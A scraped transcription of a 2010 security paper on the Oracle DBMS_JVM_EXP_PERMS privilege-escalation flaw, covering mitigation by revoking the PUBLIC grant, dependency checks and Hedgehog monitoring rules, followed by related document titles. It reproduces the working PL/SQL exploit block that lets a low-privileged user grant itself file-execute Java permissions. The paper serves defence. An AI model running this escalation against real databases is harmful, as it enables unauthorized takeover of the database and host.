Paul M. Wright Last updated Sunday 25 th February For
|
|
- Rafe Ray
- 8 years ago
- Views:
Transcription
1 Securing Java In Oracle Paul M. Wright Last updated Sunday 25 th February 2010 For Introduction...1 The DBMS_JVM_EXP_PERMS vulnerability...1 How to test revocation of PUBLIC grant on DBMS_JVM_EXP_PERMS?...3 Analysis of the generic vulnerability and long term solution...7 Conclusion...8 References...8 Appendix A...9 Introduction New Oracle Java security research was published at the February 2010 Blackhat DC conference 1, by David Litchfield, which shows how to escalate privilege from the lowest CREATE SESSION privilege to DBA via the DBMS_JVM_EXP_PERMS package associated with the Aurora JVM built into the Oracle DB. Exploit code affecting 11g and 10g has recently been published on a number of blogs such as Red Database Security 2, however there has been code for this issue available on Metalink since the 5 th of March 2009 in Doc ID: In the absence of a patch from Oracle this paper provides information on how to fix these vulnerabilities which occur in both 10g and 11g. Crucially this paper shows how to test the fixes required to secure Java privileges in Oracle, so that the availability of production applications can be shown to be unaffected by those security fixes. The DBMS_JVM_EXP_PERMS vulnerability At the centre of this new Oracle/Java security research is the vulnerability that any user with just CREATE SESSION can import their own Java permissions into Oracle using the DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS procedure which has execute granted to PUBLIC by default. Before discussing solutions, it should be noted that the DBMS_JVM_EXP_PERMS vulnerability affects fully patched This was not made clear in the bugtraq advisory. So any user can grant themselves any Java privilege (and then escalate to DBA and SYSDBA). Let s confirm that with some code Securing Java In Oracle ~ Paul M. Wright ~ 1
2 SQL> SELECT * FROM V$VERSION; BANNER Oracle Database 10g Enterprise Edition Release Prod PL/SQL Release Production CORE Production TNS for Linux: Version Production NLSRTL Version Production SQL> select comments from dba_registry_history; COMMENTS Upgraded from PSU rows selected. SQL> CREATE USER privtest IDENTIFIED BY privtest; User created. SQL> GRANT CREATE SESSION TO privtest; Grant succeeded. SQL> conn privtest/privtest@db10g; Connected. SQL> SELECT grantee_name FROM user_java_policy WHERE NAME='<<ALL FILES>>'; no rows selected SQL> DECLARE 2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; 3 CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL; 4 BEGIN 5 OPEN C1; 6 FETCH C1 BULK COLLECT INTO POL; 7 CLOSE C1; 8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); 9 END; 10 / DECLARE * ERROR at line 1: ORA-29532: Java call terminated by uncaught Java exception: java.lang.securityexception: policy table update java.lang.runtimepermission, loadlibrary.* ORA-06512: at "SYS.DBMS_JVM_EXP_PERMS", line 189 ORA-06512: at line 8 SQL> SELECT grantee_name FROM user_java_policy WHERE NAME='<<ALL FILES>>'; GRANTEE_NAME PRIVTEST So privtest user with just CREATE SESSION has been able to grant themselves execute on all OS files on No need to create any directories to exploit this. Securing Java In Oracle ~ Paul M. Wright ~ 2
3 The way that Java privileges are meant to be granted is via the dbms_java.grant_permission procedure which fails below as the privtest user does not hold the JAVA_ADMIN role required to do this, as it has not been granted the DBA role (which in turn holds the JAVA_ADMIN role). SQL> call dbms_java.grant_permission('privtest','sys:java.io.filepermission','<<all FILES>>', 'execute'); call dbms_java.grant_permission('privtest','sys:java.io.filepermission','<<all FILES>>', 'execute') * ERROR at line 1: ORA-29532: Java call terminated by uncaught Java exception: java.lang.securityexception: policy table update SYS:java.io.FilePermission, <<ALL FILES>> In other words only DBAs are meant to be able to grant Java privileges in Oracle as below. The DBMS_JVM_EXP_PERMS vulnerability means any user can do it. SQL> CONN SYSTEM/MANAGER@DB10G Connected. SQL> call dbms_java.grant_permission('scott','sys:java.io.filepermission','<<all FILES>>', 'write'); Call completed. Restricting Java privileges administration to just DBAs is for a good reason, because these privileges can be used to run OS commands as the Oracle user as discussed in the rest of NGS s Blackhat presentation and in the Author s JAVA_ADMIN to OSDBA paper 4 back in August Therefore the ability to grant oneself arbitrary Java privileges via executing DBMS_JVM_EXP_PERMS should be revoked from PUBLIC as long as this action does not cause a greater overall risk to the application s availability and performance? No point in having a secured application that does not work anymore! How to test revocation of PUBLIC grant on DBMS_JVM_EXP_PERMS? CONN SYSTEM/MANAGER; REVOKE EXECUTE ON SYS.DBMS_JVM_EXP_PERMS FROM PUBLIC; What would be the effect of revoking this PUBLIC execute ~ will it break current functionality? How can we be sure that the privilege revocation does not break a dependency either in the default code produced by Oracle or by additional development code produced internally? 4 Securing Java In Oracle ~ Paul M. Wright ~ 3
4 Figure 1 Dependencies from DBMS_JVM_EXP_PERMS calling other packages Figure 2 Dependencies from other packages calling DBMS_JVM_EXP_PERMS We can see from the previous two figures that DBMS_JVM_EXP_PERMS calls a number of packages but is not called by other packages in the second screenshot according to DBA_DEPENDENCIES, which can also be confirmed using Securing Java In Oracle ~ Paul M. Wright ~ 4
5 UTLDTREE as follows.. SQL> exec deptree_fill('package','sys','dbms_jvm_exp_perms'); PL/SQL procedure successfully completed. SQL> SELECT * FROM IDEPTREE; DEPENDENCIES PACKAGE BODY SYS.DBMS_JVM_EXP_PERMS SYNONYM PUBLIC.DBMS_JVM_EXP_PERMS PACKAGE SYS.DBMS_JVM_EXP_PERMS -- As an additional check we can all easily read through the source and find out what the package does as the package is not wrapped (see command below). SQL> select text from dba_source where name='dbms_jvm_exp_perms'; TEXT package DBMS_JVM_EXP_PERMS as TYPE temp_rec is record ( kind dba_java_policy.kind%type, grantee dba_java_policy.grantee%type, SNIP So from the above metadata held in the DB it appears that DBMS_JVM_EXP_PERMS is not used, but it would be better to be able to see for real if the package is actually used by other packages within Oracle and it s many software add-ons in real time. Let s write a Hedgehog (HH) rule to monitor DBMS_JVM_EXP_PERMS. Object= SYS.DBMS_JVM_EXP_PERMS Note that the above rule only triggers when DBMS_JVM_EXP_PERMS is successfully executed. This rule is good for profiling the use of the package, but to alert to failed attempts to exploit the package, HH must alert on the text of the SQL statement as follows. Statement matches DBMS_JVM_EXP_PERMS This second Statement rule will alert even if the executing statement fails due to lack of correct privilege for instance. A way to test this rule works is as follows. This will trigger the second rule to alert but not the first. Select DBMS_JVM_EXP_PERMS from dual; So let s run the exploit code and see what Hedgehog picks up in terms of dependencies called. Securing Java In Oracle ~ Paul M. Wright ~ 5
6 Figure 3 Dependencies called by DBMS_JVM_EXP_PERMS when executed Additionally and very usefully Hedgehog will alert if the DBMS_JVM_EXP_PERMS package is called as a dependency by ANY OTHER package. I have had this DBMS_JVM_EXP_PERMS rule monitoring for a number months on a busy system and there have been no calls made to this package during that time, even during schema and metadata datapump activity (see Appendix A). Basic Datapump functionality still works despite revoking PUBLIC execute on DBMS_JVM_EXP_PERMS. Of course the same process of monitoring calls to the package should be carried out first on your own system using Hedgehog or similar monitoring setup. This same process of Application Monitoring can be used for the 11g packages which are also the subject of NGS s research, namely DBMS_JAVA and DBMS_JAVA_TEST. So same again, monitor all activity on the packages using Hedgehog rules, to measure what accounts needs them, if any, and then grant the required privileges to those users and revoke from PUBLIC. This is low-risk, high-security change management which speeds up the mitigation process. Securing Java In Oracle ~ Paul M. Wright ~ 6
7 Analysis of the generic vulnerability and long term solution DBMS_JVM_EXP_PERMS is part of the functionality of the DB for importing and exporting privileges from one DB to another. There are some interesting questions about this package. 1. Why is DBMS_JVM_EXP_PERMS not properly documented? 2. Why is the source to DBMS_JVM_EXP_PERMS not wrapped? 3. Why is PUBLIC execute granted on DBMS_JVM_EXP_PERMS in the first place? DBMS_JVM_EXP_PERMS exemplifies the actual generic problem underlying the majority of privilege escalations in the Oracle Database i.e. execute grants on SYS packages to PUBLIC. SELECT Count(*) FROM dba_tab_privs WHERE grantee='public' AND owner='sys'; for 10g for 11g -- problem is getting worse! PUBLIC executes are supposedly a simple and well understood problem, so why is it getting worse. Is this simply a case of not implementing the Secure Development Life Cycle (SDLC) i.e. developers not considering security at the design stage? Partly, but that would be an oversimplification. I think the main reason for the original and continued existence of PUBLIC executes such as DBMS_JVM_EXP_PERMS, is that the historic design of the DB means that roles are disabled via Definer s Rights. Therefore the only way for developers to pass privileges between packages is to EITHER individually grant all privileges to all accounts involved in a chain of dependencies OR simply grant execute to PUBLIC. PUBLIC is the most convenient and in some cases the only practical method of passing on privilege to: 1. Groups of schema owning users that can pass the privilege on again via definer s rights 2. Users that do not exist yet but will do in the future So, in addition to SDLC awareness training the developers have to be given the appropriate tools to create a secure privilege structure. What needs to be done is the functionality provided by the PUBLIC role needs to be made more fine-grained so that it is not just a case of granting all or nothing. In a better database, customisable Definer s Rights Roles 5 that allow inheritance of Role based privileges through dependencies between packages would replace PUBLIC and allow it to be used for what it was originally intended i.e. a collection of harmless privileges that any user could have. So for instance we could create a Datapump Definer s Role that would enable grantees to offer these privileges in packages within their schema to other users via Definer s rights. 5 Securing Java In Oracle ~ Paul M. Wright ~ 7
8 Of course the threat posed by PUBLIC being the only way to inherit Definer s rights en-masse is exacerbated by the lack of an easy to use DENY statement. The combinatory effect of making PUBLIC the only convenient way to manage Definer s privilege dependencies, along with the inability to easily DENY access to a specific user/role should in the Author s opinion be at the core of an improvement strategy for Oracle Database Security. Especially when the database offers such functional Java APIs to access OS utilities such as orapwd, thus bypassing all DB access control. See future paper CREATE SESSION to SYSDBA at Conclusion This paper has discussed the implications of the DBMS_JVM_EXP_PERMS vulnerability and shown how to verify that the fix for the DBMS_JVM_EXP_PERMS vulnerability will not affect the workings of your Oracle database by using a DAMS to monitor related activity. Database Application Monitoring System (DAMS) enable the system owners to understand how the DB/Application works and to monitor the effect of future changes before they are implemented. This speeds up the SDLC, release processes and lowers risk of making individual changes. This same process can be used for reducing the risk of virtually all security fixes (as well as non-security fixes). This paper went on to analyse the underlying generic problem of PUBLIC executes on SYS packages and how Oracle could use Definer s Rights Roles to reduce the chance of similar vulnerabilities in the future. Securing Java In Oracle is the subject of a presentation by the Author at the ISSD Conference in London on the 21 st of May Updates to this article will be available at 6. Any questions regarding the paper contact paulmwright@oraclesecurity.com. References (November 2009 Edition of SCENE) Securing Java In Oracle ~ Paul M. Wright ~ 8
9 Appendix A SQL> SELECT * FROM DBA_TAB_PRIVS WHERE TABLE_NAME='DBMS_JVM_EXP_PERMS'; no rows selected SQL> SET SERVEROUTPUT ON SIZE SQL> DECLARE 2 l_dp_handle NUMBER; 3 l_last_job_state VARCHAR2(30) := 'UNDEFINED'; 4 l_job_state VARCHAR2(30) := 'UNDEFINED'; 5 l_sts KU$_STATUS; 6 BEGIN 7 l_dp_handle := DBMS_DATAPUMP.open( 8 operation => 'EXPORT', 9 job_mode => 'SCHEMA', 10 remote_link => NULL, 11 job_name => 'EMP_EXPORT996', 12 version => 'LATEST'); DBMS_DATAPUMP.add_file( 15 handle => l_dp_handle, 16 filename => 'SCOTT23.dmp', 17 directory => 'DATA_ARCHIVE_DIR2'); DBMS_DATAPUMP.add_file( 20 handle => l_dp_handle, 21 filename => 'SCOTT23.log', 22 directory => 'DATA_ARCHIVE_DIR2', 23 filetype => DBMS_DATAPUMP.KU$_FILE_TYPE_LOG_FILE); DBMS_DATAPUMP.metadata_filter( 26 handle => l_dp_handle, 27 name => 'SCHEMA_EXPR', 28 value => '=''SCOTT'''); DBMS_DATAPUMP.start_job(l_dp_handle); DBMS_DATAPUMP.detach(l_dp_handle); 33 END; 34 / PL/SQL procedure successfully completed. --(make sure the output files don't already exist). --This was also tested with a full metadata export. (Note this code was put together mainly from this web site Important Caveat: The above paper was written in the current absence of patching advice from Oracle Corp and is intended only as guidance. Please consult with your own support channels in the first instance. Additionally the above paper does not represent my past or current employers in any shape or form. Securing Java In Oracle ~ Paul M. Wright ~ 9
Exploiting PL/SQL Injection on Oracle 12c. with only. CREATE SESSION privileges
Exploiting PL/SQL Injection on Oracle 12c with only CREATE SESSION privileges David Litchfield [david.litchfield@datacom.com.au] 21 st May 2014 Copyright Datacom TSS http://www.datacomtss.com.au Introduction
More informationAdvanced SQL Injection in Oracle databases. Esteban Martínez Fayó
Advanced SQL Injection in Oracle databases Esteban Martínez Fayó February 2005 Outline Introduction SQL Injection attacks How to exploit Exploit examples SQL Injection in functions defined with AUTHID
More informationAchieving Security Compliancy and Database Transparency Using Database Activity Monitoring Systems
Achieving Security Compliancy and Database Transparency Using Database Activity Monitoring Systems By Paul M. Wright T he Oracle database has long been used as an effective tool for recording details that
More informationNEW AND IMPROVED: HACKING ORACLE FROM WEB. Sumit sid Siddharth 7Safe Limited UK
NEW AND IMPROVED: HACKING ORACLE FROM WEB Sumit sid Siddharth 7Safe Limited UK About 7Safe Part of PA Consulting Group Security Services Penetration testing PCI-DSS Forensics Training E-discovery About
More informationOracle PL/SQL Injection
Oracle PL/SQL Injection David Litchfield What is PL/SQL? Procedural Language / Structured Query Language Oracle s extension to standard SQL Programmable like T-SQL in the Microsoft world. Used to create
More informationHacking and Protecting Oracle DB. Slavik Markovich CTO, Sentrigo
Hacking and Protecting Oracle DB Slavik Markovich CTO, Sentrigo What s This Presentation About? Explore SQL injection in depth Protect your code Finding vulnerable code Real world example What We'll Not
More informationBest Practices for Oracle Databases Hardening Oracle 10.2.0.3 / 10.2.0.4
Best Practices for Oracle Databases Hardening Oracle 10.2.0.3 / 10.2.0.4 Alexander Kornbrust Table of Content Passwords (Security) Patches Database Settings PUBLIC Privileges Database Trigger Compiling
More informationODTUG - SQL Injection Crash Course for Oracle Developers
ODTUG - SQL Injection Crash Course for Oracle Developers Alexander Kornbrust 11-Oct-2009 Agenda Introduction How (external) hackers work Tools SQL Injection Basics SQL Injection in mod_plsql SQL Injection
More informationPentesting / Hacking Oracle databases with
IT Underground Prague 2007 Pentesting / Hacking Oracle databases with Alexander Kornbrust 9-March-2007 Table of content Introduction Find the TNS Listener TNS Listener enumeration Connecting to the database
More informationSentrigo Hedgehog Enterprise Review
Sentrigo Hedgehog Enterprise Review By Pete Finnigan, Managing Director PeteFinnigan.com Limited All trademarks are the property of their respective owners and are hereby acknowledged Introduction Welcome
More informationPenetration Testing: Advanced Oracle Exploitation Page 1
Penetration Testing: Advanced Oracle Exploitation Page 1 Course Index:: Day 1 Oracle RDBMS and the Oracle Network Architecture... 3» Introduction and Oracle Review...3» Service Information Enumeration:...3»
More informationDatabase Assessment. Vulnerability Assessment Course
Database Assessment Vulnerability Assessment Course All materials are licensed under a Creative Commons Share Alike license. http://creativecommons.org/licenses/by-sa/3.0/ 2 Agenda Introduction Configuration
More informationSetting up SQL Translation Framework OBE for Database 12cR1
Setting up SQL Translation Framework OBE for Database 12cR1 Overview Purpose This tutorial shows you how to use have an environment ready to demo the new Oracle Database 12c feature, SQL Translation Framework,
More informationOracle Database Security Myths
Oracle Database Security Myths December 13, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development Integrigy Corporation About Integrigy ERP Applications
More informationState of Wisconsin Database Hosting Services Roles and Responsibilities
State of Wisconsin Hosting Services oles and esponsibilities Document evision History (Major Post Publishing evisions Only) Date Version reator Notes 12/9/2010 1.0 This document describes the Hosting Services
More informationTop 10 Database. Misconfigurations. mtrinidad@appsecinc.com
Top 10 Database Vulnerabilities and Misconfigurations Mark Trinidad mtrinidad@appsecinc.com Some Newsworthy Breaches From 2011 2 In 2012.. Hackers carry 2011 momentum in 2012 Data theft, hacktivism, espionage
More informationPeopleSoft DDL & DDL Management
PeopleSoft DDL & DDL Management by David Kurtz, Go-Faster Consultancy Ltd. Since their takeover of PeopleSoft, Oracle has announced project Fusion, an initiative for a new generation of Oracle Applications
More informationHow to Audit the Top Ten E-Business Suite Security Risks
In-Source Your IT Audit Series How to Audit the Top Ten E-Business Suite Security Risks February 28, 2012 Jeffrey T. Hare, CPA CISA CIA Industry Analyst, Author, Consultant ERP Risk Advisors Stephen Kost
More informationA Forensic Investigation of PL/SQL Injection Attacks in Oracle 1 st July 2010 David Litchfield
A Forensic Investigation of PL/SQL Injection Attacks in Oracle 1 st July 2010 David Litchfield PL/SQL injection vulnerabilities are one of the more commonly found security flaws in the Oracle database
More informationMyOra 3.5. User Guide. SQL Tool for Oracle. Kris Murthy
MyOra 3.5 SQL Tool for Oracle User Guide Kris Murthy Contents Features... 4 Connecting to the Database... 5 Login... 5 Login History... 6 Connection Indicator... 6 Closing the Connection... 7 SQL Editor...
More informationOracle Database Security. Nathan Aaron ICTN 4040 Spring 2006
Oracle Database Security Nathan Aaron ICTN 4040 Spring 2006 Introduction It is important to understand the concepts of a database before one can grasp database security. A generic database definition is
More informationCircumvent Oracle s Database Encryption and Reverse Engineering of Oracle Key Management Algorithms. Alexander Kornbrust 28-July-2005
Circumvent Oracle s Database Encryption and Reverse Engineering of Oracle Key Management Algorithms Alexander Kornbrust 28-July-2005 Alexander Kornbrust, 28-Jul-2005 V1.06 1 Agenda 1. Motivation 2. Key
More informationSetting up the Oracle Warehouse Builder Project. Topics. Overview. Purpose
Setting up the Oracle Warehouse Builder Project Purpose In this tutorial, you setup and configure the project environment for Oracle Warehouse Builder 10g Release 2. You create a Warehouse Builder repository
More informationUsing RMAN to restore a database to another server in an ASM environment
Using RMAN to restore a database to another server in an ASM environment It is possible to restore an Oracle 11g database to another server easily in an ASM environment by following the steps below. 1.
More informationSQL Injection in web applications
SQL Injection in web applications February 2013 Slavik Markovich VP, CTO, Database Security McAfee About Me Co-Founder & CTO of Sentrigo (now McAfee Database Security) Specialties: Databases, security,
More informationOracle Security Tools
Introduction - Commercial Slide. UKOUG Conference, December 7 th 2007 Oracle Security Tools By Pete Finnigan Written Friday, 19 th October 2007 Founded February 2003 CEO Pete Finnigan Clients UK, States,
More informationMyOra 3.0. User Guide. SQL Tool for Oracle. Jayam Systems, LLC
MyOra 3.0 SQL Tool for Oracle User Guide Jayam Systems, LLC Contents Features... 4 Connecting to the Database... 5 Login... 5 Login History... 6 Connection Indicator... 6 Closing the Connection... 7 SQL
More informationOracle Audit in a Nutshell - Database Audit but how?
Oracle Audit in a Nutshell - Database Audit but how? DOAG + SOUG Security-Lounge Stefan Oehrli Senior Consultant Discipline Manager Trivadis AG Basel 24. April 2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF
More informationDeveloping SQL and PL/SQL with JDeveloper
Seite 1 von 23 Developing SQL and PL/SQL with JDeveloper Oracle JDeveloper 10g Preview Technologies used: SQL, PL/SQL An Oracle JDeveloper Tutorial September 2003 Content This tutorial walks through the
More informationOracle Database 11g: Administration Workshop I 11-2
Objectives This lesson is a starting point for learning about Oracle Security. Additional information is provided in the following documentation: Oracle Database Concepts 11g Release 1 (11.1) Oracle Database
More informationFixing Common Problems in Data Storage - A Review
Security Design For Your Database Applications Least privilege, data and ownership 1 Legal Notice Security Design For Your Database Applications Published by PeteFinnigan.com Limited 9 Beech Grove Acomb
More informationSecurity Analysis. Spoofing Oracle Session Information
November 12, 2006 Security Analysis Spoofing Oracle Session Information OVERVIEW INTRODUCTION Oracle Database session information includes database user name, operating system user name, host, terminal,
More informationDatabase security tutorial. Part I
Database security tutorial Part I Oracle Tutorials, June 4 th 2012 Daniel Gómez Blanco Agenda Authentication Roles and privileges Auditing 2 Authentication Basis of any security model Process of confirming
More informationHow To Secure A Database From A Leaky, Unsecured, And Unpatched Server
InfoSphere Guardium Ingmārs Briedis (ingmars.briedis@also.com) IBM SW solutions Agenda Any questions unresolved? The Guardium Architecture Integration with Existing Infrastructure Summary Any questions
More informationOracle E-Business Suite APPS, SYSADMIN, and oracle Securing Generic Privileged Accounts. Stephen Kost Chief Technology Officer Integrigy Corporation
Oracle E-Business Suite APPS, SYSADMIN, and oracle Securing Generic Privileged Accounts May 15, 2014 Mike Miller Chief Security Officer Integrigy Corporation Stephen Kost Chief Technology Officer Integrigy
More informationOracle Security on Windows
Introduction - commercial slide. UKOUG Windows SIG, September 25 th 2007 Oracle Security on Windows By Pete Finnigan Written Friday, 07 September 2007 Founded February 2003 CEO Pete Finnigan Clients UK,
More informationDatabase Security. Oracle Database 12c - New Features and Planning Now
Database Security Oracle Database 12c - New Features and Planning Now Michelle Malcher Oracle ACE Director Data Services Team Lead at DRW IOUG, Board of Directors Author, Oracle Database Administration
More informationOracle Net Service Name Resolution
Oracle Net Service Name Resolution Getting Rid of the TNSNAMES.ORA File! Simon Pane Oracle Database Principal Consultant March 19, 2015 ABOUT ME Working with the Oracle DB since version 6 Oracle Certified
More informationTop Ten Fraud Risks in the Oracle E Business Suite
Top Ten Fraud Risks in the Oracle E Business Suite Jeffrey T. Hare, CPA CISA CIA Industry Analyst, Author, Consultant ERP Risk Advisors Stephen Kost Chief Technology Officer Integrigy Corporation February
More informationThe Sins of SQL Programming that send the DB to Upgrade Purgatory Abel Macias. 1 Copyright 2011, Oracle and/or its affiliates. All rights reserved.
The Sins of SQL Programming that send the DB to Upgrade Purgatory Abel Macias 1 Copyright 2011, Oracle and/or its affiliates. All rights reserved. Who is Abel Macias? 1994 - Joined Oracle Support 2000
More informationConfiguration Manual. Version 3.5 - October 2012 File Transfer Daemon. Archive Digitization & Exploitation
Configuration Manual Version 3.5 - October 2012 File Transfer Daemon Archive Digitization & Exploitation IP2Archive - Configuration Manual - File Transfer Daemon Version 3.5 Copyright EVS Broadcast Equipment
More informationOracle(PL/SQL) Training
Oracle(PL/SQL) Training 30 Days Course Description: This course is designed for people who have worked with other relational databases and have knowledge of SQL, another course, called Introduction to
More informationReal Life Database Security Mistakes. Stephen Kost Integrigy Corporation Session #715
Real Life Database Security Mistakes Stephen Kost Integrigy Corporation Session #715 Background Speaker Stephen Kost CTO and Founder 16 years working with Oracle 12 years focused on Oracle security DBA,
More informationOracle Database Vault: Design Failures
Oracle Database Vault: Design Failures What is Database Vault? Helps protecting against insider threats even when these comes from privileged database users (SYS) Mandatory in certain countries: laws Can
More informationMigrate Topaz databases from One Server to Another
Title Migrate Topaz databases from One Server to Another Author: Olivier Lauret Date: November 2004 Modified: Category: Topaz/BAC Version: Topaz 4.5.2, BAC 5.0 and BAC 5.1 Migrate Topaz databases from
More informationAUTOMATIC DETECTION OF VULNERABILITY IN WRAPPED PACKAGES IN ORACLE
AUTOMATIC DETECTION OF VULNERABILITY IN WRAPPED PACKAGES IN ORACLE Presenters: Yaron Gur-Arieh Nikita Zubrilov Ilya Kolchinsky The Problem Our Project Deals With One of the key threats to the security
More informationHacking databases for owning your data. Cesar Cerrudo Esteban Martinez Fayo Argeniss (www.argeniss.com)
Hacking databases for owning your data Cesar Cerrudo Esteban Martinez Fayo Argeniss (www.argeniss.com) Overview Introduction Why database security? How databases are hacked? Oracle Database Server attacks
More informationOracle. Brief Course Content This course can be done in modular form as per the detail below. ORA-1 Oracle Database 10g: SQL 4 Weeks 4000/-
Oracle Objective: Oracle has many advantages and features that makes it popular and thereby makes it as the world's largest enterprise software company. Oracle is used for almost all large application
More informationSecuring Oracle E-Business Suite in the Cloud
Securing Oracle E-Business Suite in the Cloud November 18, 2015 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development Integrigy Corporation Agenda The
More informationOracle Insurance Policy Administration
Oracle Insurance Policy Administration Databases Installation Instructions Step 1 Version 10.1.2.0 Document Part Number: E59346-01 December, 2014 Copyright 2009, 2014, Oracle and/or its affiliates. All
More informationMonitoring Audit Trails Using Enterprise Manager
Enhancing Database Security: Monitoring Audit Trails Using Enterprise Manager Peter J. Magee, CDA SQRIBE Technologies Gail VanderKolk Reynolds & Reynolds Abstract Maintaining the security and integrity
More informationMcAfee Database Security. Dan Sarel, VP Database Security Products
McAfee Database Security Dan Sarel, VP Database Security Products Agenda Databases why are they so frail and why most customers Do very little about it? Databases more about the security problem Introducing
More informationOracle Data Redaction is Broken
Oracle Data Redaction is Broken David Litchfield [david.litchfield@datacom.com.au] 8 th November 2013 Copyright Datacom TSS http://www.datacomtss.com.au Introduction Oracle data redaction is a simple but
More informationSecurity Vulnerability Notice
Security Vulnerability Notice SE-2014-01-ORACLE [Security vulnerabilities in Oracle Database Java VM, Issues 1-20] DISCLAIMER INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY
More informationUsing SQL Developer. Copyright 2008, Oracle. All rights reserved.
Using SQL Developer Objectives After completing this appendix, you should be able to do the following: List the key features of Oracle SQL Developer Install Oracle SQL Developer Identify menu items of
More informationOracle E-Business Suite: SQL Forms Risks and. Presented by: Jeffrey T. Hare, CPA CISA CIA
Oracle E-Business Suite: SQL Forms Risks and Controls Presented by: Jeffrey T. Hare, CPA CISA CIA Presentation Agenda Overview: Introductions Overall system risks Audit Trails Change Management Implementation
More informationAll About Oracle Auditing A White Paper February 2013
A White Paper February 2013 Sr Staff Consultant Database Specialists, Inc http:www.dbspecialists.com mdean@dbspecialists.com Many organizations keep their most sensitive and valuable information in an
More informationDatabase Programming with PL/SQL: Learning Objectives
Database Programming with PL/SQL: Learning Objectives This course covers PL/SQL, a procedural language extension to SQL. Through an innovative project-based approach, students learn procedural logic constructs
More informationSecurity Implications of Oracle Product Desupport April 23, 2015
Security Implications of Oracle Product Desupport April 23, 2015 Stephen Kost Chief Technology Officer Integrigy Corporation About Integrigy ERP Applications Oracle E-Business Suite Databases Oracle and
More informationDeveloping Value from Oracle s Audit Vault For Auditors and IT Security Professionals
Developing Value from Oracle s Audit Vault For Auditors and IT Security Professionals November 13, 2014 Michael Miller Chief Security Officer Integrigy Corporation Stephen Kost Chief Technology Officer
More informationHP Quality Center. Upgrade Preparation Guide
HP Quality Center Upgrade Preparation Guide Document Release Date: November 2008 Software Release Date: November 2008 Legal Notices Warranty The only warranties for HP products and services are set forth
More informationAWS Schema Conversion Tool. User Guide Version 1.0
AWS Schema Conversion Tool User Guide AWS Schema Conversion Tool: User Guide Copyright 2016 Amazon Web Services, Inc. and/or its affiliates. All rights reserved. Amazon's trademarks and trade dress may
More informationOracle Database 10g Express
Oracle Database 10g Express This tutorial prepares the Oracle Database 10g Express Edition Developer to perform common development and administrative tasks of Oracle Database 10g Express Edition. Objectives
More informationOracle Enterprise Manager 12c New Capabilities for the DBA. Charlie Garry, Director, Product Management Oracle Server Technologies
Oracle Enterprise Manager 12c New Capabilities for the DBA Charlie Garry, Director, Product Management Oracle Server Technologies of DBAs admit doing nothing to address performance issues CHANGE AVOID
More informationCosting In Oracle HRMS CONCEPTS
Costing In Oracle HRMS CONCEPTS Costing Overview Purpose This document contains an outline of the hierarchical nature of costings in Release 10. It explains how costings entered into the Cost Allocation
More informationLesson 5 Administrative Users
Administrative Users 5.1 Lesson 5 Administrative Users A practical and hands-on lesson on creating and using Oracle administrative users. SKILLBUILDERS Administrative Users 5.2 Lesson Objectives Understand
More informationTopics Advanced PL/SQL, Integration with PROIV SuperLayer and use within Glovia
Topics Advanced PL/SQL, Integration with PROIV SuperLayer and use within Glovia 1. SQL Review Single Row Functions Character Functions Date Functions Numeric Function Conversion Functions General Functions
More informationHow To Secure The Org Database
Oracle Database Security Checklist An Oracle White Paper June 2008 Oracle Database Security Checklist Protecting the database environment... 3 Install only what is required... 3 Lock and expire default
More informationDifferent ways to guess Oracle database SID
30 October 2008 Different ways to guess Oracle database SID Digitаl Security Research Group (DSecRG) Alexander Polyakov a.polyakov@dsec.ru http://dsecrg.ru Content Introduction...3 A brief info about SID
More informationOracle 11g Database Administration
Oracle 11g Database Administration Part 1: Oracle 11g Administration Workshop I A. Exploring the Oracle Database Architecture 1. Oracle Database Architecture Overview 2. Interacting with an Oracle Database
More informationRMAN BACKUP & RECOVERY. Recovery Manager. Veeratteshwaran Sridhar
RMAN Recovery Manager BACKUP & RECOVERY Veeratteshwaran Sridhar Why Backup & Recovery? The purpose of a backup and recovery strategy is to protect the database against data loss and reconstruct the database
More information1 Introduction. 2 Technical overview/insights into FDAs. 1.1 What is what
Flashback Data Archives re-checked or reject? Beat Ramseier Consultant, IMS-ZH 22.8.2012 The promising feature Flashback Data Archives was introduced with Oracle 11g Release 1. Various limitations prevented
More informationOracle Database 12c Upgrade Tools and Best Practices from Oracle Support
Oracle Database 12c Upgrade Tools and Best Practices from Oracle Support Roderick Manalac Architect Database Proactive Support Oracle Software Support October 29, 2015 Safe Harbor Statement The following
More informationSecurity and Control Issues within Relational Databases
Security and Control Issues within Relational Databases David C. Ogbolumani, CISA, CISSP, CIA, CISM Practice Manager Information Security Preview of Key Points The Database Environment Top Database Threats
More informationOracle Database Security
Oracle Database Security Paul Needham, Senior Director, Product Management, Database Security Target of Data Breaches 2010 Data Breach Investigations Report Type Category % Breaches
More informationORACLE DATABASE ADMINISTRATOR RESUME
1 of 5 1/17/2015 1:28 PM ORACLE DATABASE ADMINISTRATOR RESUME ORACLE DBA Resumes Please note that this is a not a Job Board - We are an I.T Staffing Company and we provide candidates on a Contract basis.
More informationRailo Installation on CentOS Linux 6 Best Practices
Railo Installation on CentOS Linux 6 Best Practices Purpose: This document is intended for system administrators who want to deploy their Mura CMS, Railo, Tomcat, and JRE stack in a secure but easy to
More informationOracle Database Security. Paul Needham Senior Director, Product Management Database Security
Oracle Database Security Paul Needham Senior Director, Product Management Database Security Safe Harbor Statement The following is intended to outline our general product direction. It is intended for
More informationOracle Database 12c Enables Quad Graphics to Quickly Migrate from Sybase to Oracle Exadata
Oracle Database 12c Enables Quad Graphics to Quickly Migrate from Sybase to Oracle Exadata Presented with Prakash Nauduri Technical Director Platform Migrations Group, Database Product Management Sep 30,
More informationCross Platform Transportable Tablespaces Migration in Oracle 11g
Cross Platform Transportable Tablespaces Migration in Oracle 11g Prepared by ViSolve Migration Team June 2012 Contact ViSolve, Inc. 4010, Moorpark Avenue, #205 San Jose, California 95117 (602) 842 2738
More informationInstalling Oracle 12c Enterprise on Windows 7 64-Bit
JTHOMAS ENTERPRISES LLC Installing Oracle 12c Enterprise on Windows 7 64-Bit DOLOR SET AMET Overview This guide will step you through the process on installing a desktop-class Oracle Database Enterprises
More informationOracle Database 11g: Administration I
